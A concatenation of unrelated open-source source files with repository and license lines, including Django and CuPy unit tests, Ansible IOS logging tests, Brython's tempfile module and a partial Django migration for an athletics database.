return tree(request, id, path)
else:
form = EditZNodeForm(dict(data=node.get('data64', '')\
.decode('base64').strip(),
version=node.get('version', '-1')))
return render('edit.mako', request,
dict(path=path, form=form))
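# Illustrative settings entry (hypothetical host names) matching the keys the
# views above read from each cluster dict:
#
#   CLUSTERS = [{
#       'hostport': 'zk1.example.com:2181,zk2.example.com:2181',
#       'rest_gateway': 'http://zk1.example.com:9998',
#   }]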
|
apache-2.0
|
jonashaag/django-nonrel-nohistory
|
tests/regressiontests/datatypes/tests.py
|
50
|
4250
|
import datetime
from django.conf import settings
from django.db import DEFAULT_DB_ALIAS
from django.test import TestCase, skipIfDBFeature
from django.utils import tzinfo
from models import Donut, RumBaba
class DataTypesTestCase(TestCase):
def test_boolean_type(self):
d = Donut(name='Apple Fritter')
self.assertFalse(d.is_frosted)
self.assertTrue(d.has_sprinkles is None)
d.has_sprinkles = True
self.assertTrue(d.has_sprinkles)
d.save()
d2 = Donut.objects.get(name='Apple Fritter')
self.assertFalse(d2.is_frosted)
self.assertTrue(d2.has_sprinkles)
def test_date_type(self):
d = Donut(name='Apple Fritter')
d.baked_date = datetime.date(year=1938, month=6, day=4)
d.baked_time = datetime.time(hour=5, minute=30)
d.consumed_at = datetime.datetime(year=2007, month=4, day=20, hour=16, minute=19, second=59)
d.save()
d2 = Donut.objects.get(name='Apple Fritter')
self.assertEqual(d2.baked_date, datetime.date(1938, 6, 4))
self.assertEqual(d2.baked_time, datetime.time(5, 30))
self.assertEqual(d2.consumed_at, datetime.datetime(2007, 4, 20, 16, 19, 59))
def test_time_field(self):
#Test for ticket #12059: TimeField wrongly handling datetime.datetime object.
d = Donut(name='Apple Fritter')
d.baked_time = datetime.datetime(year=2007, month=4, day=20, hour=16, minute=19, second=59)
d.save()
d2 = Donut.objects.get(name='Apple Fritter')
self.assertEqual(d2.baked_time, datetime.time(16, 19, 59))
def test_year_boundaries(self):
"""Year boundary tests (ticket #3689)"""
d = Donut.objects.create(name='Date Test 2007',
baked_date=datetime.datetime(year=2007, month=12, day=31),
consumed_at=datetime.datetime(year=2007, month=12, day=31, hour=23, minute=59, second=59))
d1 = Donut.objects.create(name='Date Test 2006',
baked_date=datetime.datetime(year=2006, month=1, day=1),
consumed_at=datetime.datetime(year=2006, month=1, day=1))
self.assertEqual("Date Test 2007",
Donut.objects.filter(baked_date__year=2007)[0].name)
self.assertEqual("Date Test 2006",
Donut.objects.filter(baked_date__year=2006)[0].name)
d2 = Donut.objects.create(name='Apple Fritter',
consumed_at = datetime.datetime(year=2007, month=4, day=20, hour=16, minute=19, second=59))
self.assertEqual([u'Apple Fritter', u'Date Test 2007'],
list(Donut.objects.filter(consumed_at__year=2007).order_by('name').values_list('name', flat=True)))
self.assertEqual(0, Donut.objects.filter(consumed_at__year=2005).count())
self.assertEqual(0, Donut.objects.filter(consumed_at__year=2008).count())
def test_textfields_unicode(self):
"""Regression test for #10238: TextField values returned from the
database should be unicode."""
d = Donut.objects.create(name=u'Jelly Donut', review=u'Outstanding')
newd = Donut.objects.get(id=d.id)
self.assertTrue(isinstance(newd.review, unicode))
@skipIfDBFeature('supports_timezones')
def test_error_on_timezone(self):
"""Regression test for #8354: the MySQL and Oracle backends should raise
an error if given a timezone-aware datetime object."""
dt = datetime.datetime(2008, 8, 31, 16, 20, tzinfo=tzinfo.FixedOffset(0))
d = Donut(name='Bear claw', consumed_at=dt)
self.assertRaises(ValueError, d.save)
# ValueError: MySQL backend does not support timezone-aware datetimes.
def test_datefield_auto_now_add(self):
"""Regression test for #10970, auto_now_add for DateField should store
a Python datetime.date, not a datetime.datetime"""
b = RumBaba.objects.create()
# Verify we didn't break DateTimeField behavior
self.assertTrue(isinstance(b.baked_timestamp, datetime.datetime))
# We need to test this way because datetime.datetime inherits
# from datetime.date:
self.assertTrue(isinstance(b.baked_date, datetime.date) and not isinstance(b.baked_date, datetime.datetime))
|
bsd-3-clause
|
40323144/2015cdb_g7
|
static/Brython3.1.1-20150328-091302/Lib/tempfile.py
|
728
|
22357
|
"""Temporary files.
This module provides generic, low- and high-level interfaces for
creating temporary files and directories. The interfaces listed
as "safe" just below can be used without fear of race conditions.
Those listed as "unsafe" cannot, and are provided for backward
compatibility only.
This module also provides some data items to the user:
TMP_MAX - maximum number of names that will be tried before
giving up.
tempdir - If this is set to a string before the first use of
any routine from this module, it will be considered as
another candidate location to store temporary files.
"""
__all__ = [
"NamedTemporaryFile", "TemporaryFile", # high level safe interfaces
"SpooledTemporaryFile", "TemporaryDirectory",
"mkstemp", "mkdtemp", # low level safe interfaces
"mktemp", # deprecated unsafe interface
"TMP_MAX", "gettempprefix", # constants
"tempdir", "gettempdir"
]
# Imports.
import warnings as _warnings
import sys as _sys
import io as _io
import os as _os
import errno as _errno
from random import Random as _Random
try:
import fcntl as _fcntl
except ImportError:
def _set_cloexec(fd):
pass
else:
def _set_cloexec(fd):
try:
flags = _fcntl.fcntl(fd, _fcntl.F_GETFD, 0)
except OSError:
pass
else:
# flags read successfully, modify
flags |= _fcntl.FD_CLOEXEC
_fcntl.fcntl(fd, _fcntl.F_SETFD, flags)
try:
import _thread
except ImportError:
import _dummy_thread as _thread
_allocate_lock = _thread.allocate_lock
_text_openflags = _os.O_RDWR | _os.O_CREAT | _os.O_EXCL
if hasattr(_os, 'O_NOINHERIT'):
_text_openflags |= _os.O_NOINHERIT
if hasattr(_os, 'O_NOFOLLOW'):
_text_openflags |= _os.O_NOFOLLOW
_bin_openflags = _text_openflags
if hasattr(_os, 'O_BINARY'):
_bin_openflags |= _os.O_BINARY
if hasattr(_os, 'TMP_MAX'):
TMP_MAX = _os.TMP_MAX
else:
TMP_MAX = 10000
# Although it does not have an underscore for historical reasons, this
# variable is an internal implementation detail (see issue 10354).
template = "tmp"
# Internal routines.
_once_lock = _allocate_lock()
if hasattr(_os, "lstat"):
_stat = _os.lstat
elif hasattr(_os, "stat"):
_stat = _os.stat
else:
# Fallback. All we need is something that raises OSError if the
# file doesn't exist.
def _stat(fn):
f = open(fn)
f.close()
def _exists(fn):
try:
_stat(fn)
except OSError:
return False
else:
return True
class _RandomNameSequence:
"""An instance of _RandomNameSequence generates an endless
sequence of unpredictable strings which can safely be incorporated
into file names. Each string is six characters long. Multiple
threads can safely use the same instance at the same time.
_RandomNameSequence is an iterator."""
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
@property
def rng(self):
cur_pid = _os.getpid()
if cur_pid != getattr(self, '_rng_pid', None):
self._rng = _Random()
self._rng_pid = cur_pid
return self._rng
def __iter__(self):
return self
def __next__(self):
c = self.characters
choose = self.rng.choice
letters = [choose(c) for dummy in "123456"]
return ''.join(letters)
def _candidate_tempdir_list():
"""Generate a list of candidate temporary directories which
_get_default_tempdir will try."""
dirlist = []
# First, try the environment.
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = _os.getenv(envname)
if dirname: dirlist.append(dirname)
# Failing that, try OS-specific locations.
if _os.name == 'nt':
dirlist.extend([ r'c:\temp', r'c:\tmp', r'\temp', r'\tmp' ])
else:
dirlist.extend([ '/tmp', '/var/tmp', '/usr/tmp' ])
# As a last resort, the current directory.
try:
dirlist.append(_os.getcwd())
except (AttributeError, OSError):
dirlist.append(_os.curdir)
return dirlist
def _get_default_tempdir():
"""Calculate the default directory to use for temporary files.
This routine should be called exactly once.
We determine whether or not a candidate temp dir is usable by
trying to create and write to a file in that directory. If this
is successful, the test file is deleted. To prevent denial of
service, the name of the test file must be randomized."""
namer = _RandomNameSequence()
dirlist = _candidate_tempdir_list()
for dir in dirlist:
if dir != _os.curdir:
dir = _os.path.normcase(_os.path.abspath(dir))
# Try only a few names per directory.
for seq in range(100):
name = next(namer)
filename = _os.path.join(dir, name)
try:
fd = _os.open(filename, _bin_openflags, 0o600)
try:
try:
with _io.open(fd, 'wb', closefd=False) as fp:
fp.write(b'blat')
finally:
_os.close(fd)
finally:
_os.unlink(filename)
return dir
except FileExistsError:
pass
except OSError:
break # no point trying more names in this directory
raise FileNotFoundError(_errno.ENOENT,
"No usable temporary directory found in %s" %
dirlist)
_name_sequence = None
def _get_candidate_names():
"""Common setup sequence for all user-callable interfaces."""
global _name_sequence
if _name_sequence is None:
_once_lock.acquire()
try:
if _name_sequence is None:
_name_sequence = _RandomNameSequence()
finally:
_once_lock.release()
return _name_sequence
def _mkstemp_inner(dir, pre, suf, flags):
"""Code common to mkstemp, TemporaryFile, and NamedTemporaryFile."""
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, pre + name + suf)
try:
fd = _os.open(file, flags, 0o600)
_set_cloexec(fd)
return (fd, _os.path.abspath(file))
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if _os.name == 'nt':
continue
else:
raise
raise FileExistsError(_errno.EEXIST,
"No usable temporary file name found")
# User visible interfaces.
def gettempprefix():
"""Accessor for tempdir.template."""
return template
tempdir = None
def gettempdir():
"""Accessor for tempfile.tempdir."""
global tempdir
if tempdir is None:
_once_lock.acquire()
try:
if tempdir is None:
tempdir = _get_default_tempdir()
finally:
_once_lock.release()
return tempdir
def mkstemp(suffix="", prefix=template, dir=None, text=False):
"""User-callable function to create and return a unique temporary
file. The return value is a pair (fd, name) where fd is the
file descriptor returned by os.open, and name is the filename.
If 'suffix' is specified, the file name will end with that suffix,
otherwise there will be no suffix.
If 'prefix' is specified, the file name will begin with that prefix,
otherwise a default prefix is used.
If 'dir' is specified, the file will be created in that directory,
otherwise a default directory is used.
If 'text' is specified and true, the file is opened in text
mode. Else (the default) the file is opened in binary mode. On
some operating systems, this makes no difference.
The file is readable and writable only by the creating user ID.
If the operating system uses permission bits to indicate whether a
file is executable, the file is executable by no one. The file
descriptor is not inherited by children of this process.
Caller is responsible for deleting the file when done with it.
"""
if dir is None:
dir = gettempdir()
if text:
flags = _text_openflags
else:
flags = _bin_openflags
return _mkstemp_inner(dir, prefix, suffix, flags)
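# Typical usage (illustrative): the caller owns both the descriptor and the
# file, so it must close and remove them explicitly:
#
#   fd, path = mkstemp(suffix=".txt")
#   try:
#       _os.write(fd, b"scratch data")
#   finally:
#       _os.close(fd)
#       _os.unlink(path)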
def mkdtemp(suffix="", prefix=template, dir=None):
"""User-callable function to create and return a unique temporary
directory. The return value is the pathname of the directory.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
The directory is readable, writable, and searchable only by the
creating user.
Caller is responsible for deleting the directory when done with it.
"""
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
try:
_os.mkdir(file, 0o700)
return file
except FileExistsError:
continue # try again
raise FileExistsError(_errno.EEXIST,
"No usable temporary directory name found")
def mktemp(suffix="", prefix=template, dir=None):
"""User-callable function to return a unique temporary file name. The
file is not created.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
This function is unsafe and should not be used. The file name
refers to a file that did not exist at some point, but by the time
you get around to creating it, someone else may have beaten you to
the punch.
"""
## from warnings import warn as _warn
## _warn("mktemp is a potential security risk to your program",
## RuntimeWarning, stacklevel=2)
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
if not _exists(file):
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary filename found")
class _TemporaryFileWrapper:
"""Temporary file wrapper
This class provides a wrapper around files opened for
temporary use. In particular, it seeks to automatically
remove the file when it is no longer needed.
"""
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.close_called = False
self.delete = delete
def __getattr__(self, name):
# Attribute lookups are delegated to the underlying file
# and cached for non-numeric results
# (i.e. methods are cached, closed and friends are not)
file = self.__dict__['file']
a = getattr(file, name)
if not isinstance(a, int):
setattr(self, name, a)
return a
# The underlying __enter__ method returns the wrong object
# (self.file) so override it to return the wrapper
def __enter__(self):
self.file.__enter__()
return self
# iter() doesn't use __getattr__ to find the __iter__ method
def __iter__(self):
return iter(self.file)
# NT provides delete-on-close as a primitive, so we don't need
# the wrapper to do anything special. We still use it so that
# file.name is useful (i.e. not "(fdopen)") with NamedTemporaryFile.
if _os.name != 'nt':
# Cache the unlinker so we don't get spurious errors at
# shutdown when the module-level "os" is None'd out. Note
# that this must be referenced as self.unlink, because the
# name TemporaryFileWrapper may also get None'd out before
# __del__ is called.
unlink = _os.unlink
def close(self):
if not self.close_called:
self.close_called = True
self.file.close()
if self.delete:
self.unlink(self.name)
def __del__(self):
self.close()
# Need to trap __exit__ as well to ensure the file gets
# deleted when used in a with statement
def __exit__(self, exc, value, tb):
result = self.file.__exit__(exc, value, tb)
self.close()
return result
else:
def __exit__(self, exc, value, tb):
self.file.__exit__(exc, value, tb)
def NamedTemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix="", prefix=template,
dir=None, delete=True):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
'delete' -- whether the file is deleted on close (default True).
The file is created as mkstemp() would do it.
Returns an object with a file-like interface; the name of the file
is accessible as file.name. The file will be automatically deleted
when it is closed unless the 'delete' argument is set to False.
"""
if dir is None:
dir = gettempdir()
flags = _bin_openflags
# Setting O_TEMPORARY in the flags causes the OS to delete
# the file when it is closed. This is only supported by Windows.
if _os.name == 'nt' and delete:
flags |= _os.O_TEMPORARY
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags)
file = _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
return _TemporaryFileWrapper(file, name, delete)
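# Typical usage (illustrative): the wrapper behaves like the underlying file
# object and removes the file on close unless delete=False was passed:
#
#   with NamedTemporaryFile(suffix=".log") as tmp:
#       tmp.write(b"hello")
#       tmp.flush()
#       print(tmp.name)   # real path on disk while the block is open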
if _os.name != 'posix' or _os.sys.platform == 'cygwin':
# On non-POSIX and Cygwin systems, assume that we cannot unlink a file
# while it is open.
TemporaryFile = NamedTemporaryFile
else:
def TemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix="", prefix=template,
dir=None):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
The file is created as mkstemp() would do it.
Returns an object with a file-like interface. The file has no
name, and will cease to exist when it is closed.
"""
if dir is None:
dir = gettempdir()
flags = _bin_openflags
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags)
try:
_os.unlink(name)
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
class SpooledTemporaryFile:
"""Temporary file wrapper, specialized to switch from BytesIO
or StringIO to a real file when it exceeds a certain size or
when a fileno is needed.
"""
_rolled = False
def __init__(self, max_size=0, mode='w+b', buffering=-1,
encoding=None, newline=None,
suffix="", prefix=template, dir=None):
if 'b' in mode:
self._file = _io.BytesIO()
else:
# Setting newline="\n" avoids newline translation;
# this is important because otherwise on Windows we'd
# get double newline translation upon rollover().
self._file = _io.StringIO(newline="\n")
self._max_size = max_size
self._rolled = False
self._TemporaryFileArgs = {'mode': mode, 'buffering': buffering,
'suffix': suffix, 'prefix': prefix,
'encoding': encoding, 'newline': newline,
'dir': dir}
def _check(self, file):
if self._rolled: return
max_size = self._max_size
if max_size and file.tell() > max_size:
self.rollover()
def rollover(self):
if self._rolled: return
file = self._file
newfile = self._file = TemporaryFile(**self._TemporaryFileArgs)
del self._TemporaryFileArgs
newfile.write(file.getvalue())
newfile.seek(file.tell(), 0)
self._rolled = True
# The method caching trick from NamedTemporaryFile
# won't work here, because _file may change from a
# BytesIO/StringIO instance to a real file. So we list
# all the methods directly.
# Context management protocol
def __enter__(self):
if self._file.closed:
raise ValueError("Cannot enter context with closed file")
return self
def __exit__(self, exc, value, tb):
self._file.close()
# file protocol
def __iter__(self):
return self._file.__iter__()
def close(self):
self._file.close()
@property
def closed(self):
return self._file.closed
@property
def encoding(self):
try:
return self._file.encoding
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['encoding']
def fileno(self):
self.rollover()
return self._file.fileno()
def flush(self):
self._file.flush()
def isatty(self):
return self._file.isatty()
@property
def mode(self):
try:
return self._file.mode
except AttributeError:
return self._TemporaryFileArgs['mode']
@property
def name(self):
try:
return self._file.name
except AttributeError:
return None
@property
def newlines(self):
try:
return self._file.newlines
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['newline']
def read(self, *args):
return self._file.read(*args)
def readline(self, *args):
return self._file.readline(*args)
def readlines(self, *args):
return self._file.readlines(*args)
def seek(self, *args):
self._file.seek(*args)
@property
def softspace(self):
return self._file.softspace
def tell(self):
return self._file.tell()
def truncate(self, size=None):
if size is None:
self._file.truncate()
else:
if size > self._max_size:
self.rollover()
self._file.truncate(size)
def write(self, s):
file = self._file
rv = file.write(s)
self._check(file)
return rv
def writelines(self, iterable):
file = self._file
rv = file.writelines(iterable)
self._check(file)
return rv
class TemporaryDirectory(object):
"""Create and return a temporary directory. This has the same
behavior as mkdtemp but can be used as a context manager. For
example:
with TemporaryDirectory() as tmpdir:
...
Upon exiting the context, the directory and everything contained
in it are removed.
"""
def __init__(self, suffix="", prefix=template, dir=None):
self._closed = False
self.name = None # Handle mkdtemp raising an exception
self.name = mkdtemp(suffix, prefix, dir)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def cleanup(self, _warn=False):
if self.name and not self._closed:
try:
self._rmtree(self.name)
except (TypeError, AttributeError) as ex:
# Issue #10188: Emit a warning on stderr
# if the directory could not be cleaned
# up due to missing globals
if "None" not in str(ex):
raise
print("ERROR: {!r} while cleaning up {!r}".format(ex, self,),
file=_sys.stderr)
return
self._closed = True
if _warn:
self._warn("Implicitly cleaning up {!r}".format(self),
ResourceWarning)
def __exit__(self, exc, value, tb):
self.cleanup()
def __del__(self):
# Issue a ResourceWarning if implicit cleanup needed
self.cleanup(_warn=True)
# XXX (ncoghlan): The following code attempts to make
# this class tolerant of the module nulling out process
# that happens during CPython interpreter shutdown
# Alas, it doesn't actually manage it. See issue #10188
_listdir = staticmethod(_os.listdir)
_path_join = staticmethod(_os.path.join)
_isdir = staticmethod(_os.path.isdir)
_islink = staticmethod(_os.path.islink)
_remove = staticmethod(_os.remove)
_rmdir = staticmethod(_os.rmdir)
_os_error = OSError
_warn = _warnings.warn
def _rmtree(self, path):
# Essentially a stripped down version of shutil.rmtree. We can't
# use globals because they may be None'ed out at shutdown.
for name in self._listdir(path):
fullname = self._path_join(path, name)
try:
isdir = self._isdir(fullname) and not self._islink(fullname)
except self._os_error:
isdir = False
if isdir:
self._rmtree(fullname)
else:
try:
self._remove(fullname)
except self._os_error:
pass
try:
self._rmdir(path)
except self._os_error:
pass
|
gpl-3.0
|
valentin-krasontovitsch/ansible
|
test/units/modules/network/ios/test_ios_logging.py
|
30
|
2538
|
#
# (c) 2016 Red Hat Inc.
# (c) 2017 Paul Neumann
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from units.compat.mock import patch
from ansible.modules.network.ios import ios_logging
from units.modules.utils import set_module_args
from .ios_module import TestIosModule, load_fixture
class TestIosLoggingModule(TestIosModule):
module = ios_logging
def setUp(self):
super(TestIosLoggingModule, self).setUp()
self.mock_get_config = patch('ansible.modules.network.ios.ios_logging.get_config')
self.get_config = self.mock_get_config.start()
self.mock_load_config = patch('ansible.modules.network.ios.ios_logging.load_config')
self.load_config = self.mock_load_config.start()
self.mock_get_capabilities = patch('ansible.modules.network.ios.ios_logging.get_capabilities')
self.get_capabilities = self.mock_get_capabilities.start()
self.get_capabilities.return_value = {'device_info': {'network_os_version': '15.6(2)T'}}
def tearDown(self):
super(TestIosLoggingModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
self.mock_get_capabilities.stop()
def load_fixtures(self, commands=None):
self.get_config.return_value = load_fixture('ios_logging_config.cfg')
self.load_config.return_value = None
def test_ios_logging_buffer_size_changed_implicit(self):
set_module_args(dict(dest='buffered'))
commands = ['logging buffered 4096']
self.execute_module(changed=True, commands=commands)
def test_ios_logging_buffer_size_changed_explicit(self):
set_module_args(dict(dest='buffered', size=6000))
commands = ['logging buffered 6000']
self.execute_module(changed=True, commands=commands)
|
gpl-3.0
|
muupan/chainer
|
tests/cupy_tests/manipulation_tests/test_transpose.py
|
2
|
1416
|
import unittest
import cupy
from cupy import testing
@testing.gpu
class TestTranspose(unittest.TestCase):
_multiprocess_can_split_ = True
@testing.numpy_cupy_array_equal()
def test_rollaxis(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return xp.rollaxis(a, 2)
def test_rollaxis_failure(self):
a = testing.shaped_arange((2, 3, 4))
with self.assertRaises(ValueError):
cupy.rollaxis(a, 3)
@testing.numpy_cupy_array_equal()
def test_swapaxes(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return xp.swapaxes(a, 2, 0)
def test_swapaxes_failure(self):
a = testing.shaped_arange((2, 3, 4))
with self.assertRaises(ValueError):
cupy.swapaxes(a, 3, 0)
@testing.numpy_cupy_array_equal()
def test_transpose(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return a.transpose(-1, 0, 1)
@testing.numpy_cupy_array_equal()
def test_transpose_empty(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return a.transpose()
@testing.numpy_cupy_array_equal()
def test_external_transpose(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return xp.transpose(a)
@testing.numpy_cupy_array_equal()
def test_transpose_none(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return a.transpose(None)
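# Rough NumPy illustration of the shape changes checked above (cupy mirrors
# numpy here; shaped_arange((2, 3, 4)) produces an array of shape (2, 3, 4)):
#
#   import numpy as np
#   a = np.arange(24).reshape(2, 3, 4)
#   np.rollaxis(a, 2).shape      # -> (4, 2, 3)
#   np.swapaxes(a, 2, 0).shape   # -> (4, 3, 2)
#   a.transpose(-1, 0, 1).shape  # -> (4, 2, 3)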
|
mit
|
ppoile/athletica-adapter
|
main/migrations/0001_squashed_0005_auto_20150304_0020.py
|
1
|
44968
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
replaces = [(b'main', '0001_initial'), (b'main', '0002_auto_20150303_1207'), (b'main', '0003_auto_20150303_1321'), (b'main', '0004_auto_20150303_1413'), (b'main', '0005_auto_20150304_0020')]
dependencies = [
]
operations = [
migrations.CreateModel(
name='Anlage',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xAnlage')),
('bezeichnung', models.CharField(max_length=20, db_column='Bezeichnung')),
('homologiert', models.CharField(default='y', max_length=1, db_column='Homologiert', choices=[('y', 'Yes'), ('n', 'No')])),
],
options={
'ordering': ['bezeichnung'],
'db_table': 'anlage',
'verbose_name_plural': 'anlagen',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Anmeldung',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xAnmeldung')),
('startnummer', models.IntegerField(db_column='Startnummer')),
('erstserie', models.CharField(max_length=1, db_column='Erstserie')),
('bezahlt', models.CharField(max_length=1, db_column='Bezahlt')),
('gruppe', models.CharField(max_length=2, db_column='Gruppe')),
('bestleistungmk', models.FloatField(db_column='BestleistungMK')),
('vereinsinfo', models.CharField(max_length=150, db_column='Vereinsinfo')),
('xteam', models.IntegerField(db_column='xTeam')),
('baseeffortmk', models.CharField(max_length=1, db_column='BaseEffortMK')),
('anmeldenr_zlv', models.IntegerField(null=True, db_column='Anmeldenr_ZLV', blank=True)),
('kidid', models.IntegerField(null=True, db_column='KidID', blank=True)),
('angemeldet', models.CharField(max_length=1, db_column='Angemeldet', blank=True)),
('vorjahrleistungmk', models.IntegerField(null=True, db_column='VorjahrLeistungMK', blank=True)),
],
options={
'db_table': 'anmeldung',
'verbose_name_plural': 'anmeldungen',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Athlet',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xAthlet')),
('name', models.CharField(max_length=50, db_column='Name')),
('vorname', models.CharField(max_length=50, db_column='Vorname')),
('jahrgang', models.IntegerField(db_column='Jahrgang', blank=True)),
('xverein2', models.IntegerField(db_column='xVerein2')),
('lizenznummer', models.IntegerField(db_column='Lizenznummer')),
('geschlecht', models.CharField(max_length=1, db_column='Geschlecht', choices=[('m', 'M\xe4nnlich'), ('w', 'Weiblich')])),
('land', models.CharField(max_length=3, db_column='Land')),
('geburtstag', models.DateField(null=True, db_column='Geburtstag')),
('athleticagen', models.CharField(max_length=1, db_column='Athleticagen')),
('bezahlt', models.CharField(max_length=1, db_column='Bezahlt')),
('xregion', models.IntegerField(db_column='xRegion')),
('lizenztyp', models.IntegerField(db_column='Lizenztyp')),
('manuell', models.IntegerField(db_column='Manuell')),
('adresse', models.CharField(max_length=50, db_column='Adresse', blank=True)),
('plz', models.IntegerField(null=True, db_column='Plz', blank=True)),
('ort', models.CharField(max_length=50, db_column='Ort', blank=True)),
('email', models.CharField(max_length=50, db_column='Email', blank=True)),
],
options={
'db_table': 'athlet',
'verbose_name_plural': 'athleten',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='anmeldung',
name='athlet',
field=models.ForeignKey(related_name='anmeldungen', db_column='xAthlet', to='main.Athlet'),
preserve_default=True,
),
migrations.CreateModel(
name='BaseAccount',
fields=[
('account_code', models.CharField(max_length=30, serialize=False, primary_key=True)),
('account_name', models.CharField(max_length=255)),
('account_short', models.CharField(max_length=255)),
('account_type', models.CharField(max_length=100)),
('lg', models.CharField(max_length=100)),
],
options={
'db_table': 'base_account',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BaseAthlete',
fields=[
('id_athlete', models.AutoField(serialize=False, primary_key=True)),
('license', models.IntegerField()),
('license_paid', models.CharField(max_length=1)),
('license_cat', models.CharField(max_length=4)),
('lastname', models.CharField(max_length=100)),
('firstname', models.CharField(max_length=100)),
('sex', models.CharField(max_length=1)),
('nationality', models.CharField(max_length=3)),
('account_code', models.CharField(max_length=30)),
('second_account_code', models.CharField(max_length=30)),
('birth_date', models.DateField(null=True)),
('account_info', models.CharField(max_length=150)),
],
options={
'db_table': 'base_athlete',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BaseLog',
fields=[
('id_log', models.AutoField(serialize=False, primary_key=True)),
('type', models.CharField(max_length=50)),
('update_time', models.DateTimeField()),
('global_last_change', models.DateField()),
],
options={
'db_table': 'base_log',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BasePerformance',
fields=[
('id_performance', models.AutoField(serialize=False, primary_key=True)),
('id_athlete', models.IntegerField()),
('discipline', models.IntegerField()),
('category', models.CharField(max_length=10)),
('best_effort', models.CharField(max_length=15)),
('best_effort_date', models.DateField(null=True)),
('best_effort_event', models.CharField(max_length=100)),
('season_effort', models.CharField(max_length=15)),
('season_effort_date', models.DateField(null=True)),
('season_effort_event', models.CharField(max_length=100)),
('notification_effort', models.CharField(max_length=15)),
('notification_effort_date', models.DateField(null=True)),
('notification_effort_event', models.CharField(max_length=100)),
('season', models.CharField(max_length=1)),
],
options={
'db_table': 'base_performance',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BaseRelay',
fields=[
('id_relay', models.AutoField(serialize=False, primary_key=True)),
('is_athletica_gen', models.CharField(max_length=1)),
('relay_name', models.CharField(max_length=255)),
('category', models.CharField(max_length=10)),
('discipline', models.CharField(max_length=10)),
('account_code', models.IntegerField()),
],
options={
'db_table': 'base_relay',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BaseSvm',
fields=[
('id_svm', models.AutoField(serialize=False, primary_key=True)),
('is_athletica_gen', models.CharField(max_length=1)),
('svm_name', models.CharField(max_length=255)),
('svm_category', models.CharField(max_length=10)),
('account_code', models.IntegerField()),
],
options={
'db_table': 'base_svm',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DisziplinDe',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xDisziplin')),
('kurzname', models.CharField(unique=True, max_length=15, db_column='Kurzname')),
('name', models.CharField(max_length=40, db_column='Name')),
('anzeige', models.IntegerField(db_column='Anzeige')),
('seriegroesse', models.IntegerField(db_column='Seriegroesse')),
('staffellaeufer', models.IntegerField(null=True, db_column='Staffellaeufer', blank=True)),
('typ', models.IntegerField(db_column='Typ')),
('appellzeit', models.TimeField(db_column='Appellzeit')),
('stellzeit', models.TimeField(db_column='Stellzeit')),
('strecke', models.FloatField(db_column='Strecke')),
('code', models.IntegerField(db_column='Code')),
('xomega_typ', models.IntegerField(db_column='xOMEGA_Typ')),
('aktiv', models.CharField(max_length=1)),
],
options={
'db_table': 'disziplin_de',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DisziplinFr',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xDisziplin')),
